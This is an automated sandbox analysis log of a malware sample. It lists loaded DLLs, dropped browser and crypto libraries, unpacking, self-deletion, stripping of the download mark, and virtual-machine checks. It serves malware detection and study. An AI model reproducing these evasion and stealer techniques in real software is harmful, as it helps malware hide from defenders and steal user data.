                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: mozglue.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: dlnashext.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: wpdshext.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: Binary string: freebl3.pdb source: katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.13.dr, freebl3[1].dll.13.dr
                  Source: Binary string: mozglue.pdbP source: katA304.tmp, 0000000D.00000002.3150422505.000000006CFBD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.13.dr, mozglue[1].dll.13.dr
                  Source: Binary string: freebl3.pdbp source: katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.13.dr, freebl3[1].dll.13.dr
                  Source: Binary string: nss3.pdb@ source: katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, nss3[1].dll.13.dr, nss3.dll.13.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.13.dr, softokn3.dll.13.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.13.dr, vcruntime140[1].dll.13.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.13.dr, msvcp140[1].dll.13.dr
                  Source: Binary string: nss3.pdb source: katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, nss3[1].dll.13.dr, nss3.dll.13.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.dr
                  Source: Binary string: mozglue.pdb source: katA304.tmp, 0000000D.00000002.3150422505.000000006CFBD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.13.dr, mozglue[1].dll.13.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.13.dr, softokn3.dll.13.dr

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeUnpacked PE file: 5.2.21AE.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeUnpacked PE file: 5.2.21AE.exe.400000.0.unpack
                  Source: sqls[1].dll.13.drStatic PE information: real checksum: 0x0 should be: 0x263795
                  Source: C9A7.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x20fc0c
                  Source: aarhevh.2.drStatic PE information: real checksum: 0x16f83 should be: 0x14dc5
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeStatic PE information: real checksum: 0x16f83 should be: 0x14dc5
                  Source: katA304.tmp.12.drStatic PE information: real checksum: 0x0 should be: 0xdfa9e
                  Source: sqls[1].dll.13.drStatic PE information: section name: .00cfg
                  Source: freebl3.dll.13.drStatic PE information: section name: .00cfg
                  Source: freebl3[1].dll.13.drStatic PE information: section name: .00cfg
                  Source: mozglue.dll.13.drStatic PE information: section name: .00cfg
                  Source: mozglue[1].dll.13.drStatic PE information: section name: .00cfg
                  Source: msvcp140.dll.13.drStatic PE information: section name: .didat
                  Source: msvcp140[1].dll.13.drStatic PE information: section name: .didat
                  Source: nss3.dll.13.drStatic PE information: section name: .00cfg
                  Source: nss3[1].dll.13.drStatic PE information: section name: .00cfg
                  Source: softokn3.dll.13.drStatic PE information: section name: .00cfg
                  Source: softokn3[1].dll.13.drStatic PE information: section name: .00cfg
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeCode function: 0_2_00402CD7 push cs; retf 0_2_00402CD8
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeCode function: 0_2_00401EA7 push 0000000Eh; retf 0038h0_2_00401EB6
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeCode function: 0_2_004033B6 push eax; ret 0_2_00403419
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_0216030D push ecx; ret 5_2_02160315
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeCode function: 12_2_042DB010 push edx; ret 12_2_042DB21F
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeCode function: 12_2_042DA910 push edx; ret 12_2_042DA91B
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeStatic PE information: section name: .text entropy: 7.0432856719930195
                  Source: aarhevh.2.drStatic PE information: section name: .text entropy: 7.0432856719930195
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dllJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\aarhevhJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile created: C:\ProgramData\GIEHIDHJDBFI\freebl3.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile created: C:\ProgramData\GIEHIDHJDBFI\softokn3.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile created: C:\ProgramData\GIEHIDHJDBFI\msvcp140.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile created: C:\ProgramData\GIEHIDHJDBFI\nss3.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile created: C:\ProgramData\GIEHIDHJDBFI\vcruntime140.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dllJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\21AE.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeFile created: C:\Users\user\AppData\Local\Temp\katA304.tmpJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C9A7.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqls[1].dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile created: C:\ProgramData\GIEHIDHJDBFI\mozglue.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile created: C:\ProgramData\GIEHIDHJDBFI\freebl3.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile created: C:\ProgramData\GIEHIDHJDBFI\softokn3.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile created: C:\ProgramData\GIEHIDHJDBFI\msvcp140.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile created: C:\ProgramData\GIEHIDHJDBFI\nss3.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile created: C:\ProgramData\GIEHIDHJDBFI\vcruntime140.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile created: C:\ProgramData\GIEHIDHJDBFI\mozglue.dllJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\aarhevhJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Deletes itself after installation
                  Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeJump to behavior
                  Hides that the sample has been downloaded from the Internet (zone.identifier)
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\aarhevh:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: katA304.tmp PID: 1436, type: MEMORYSTR
                  Checks if the current machine is a virtual machine (disk enumeration)
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
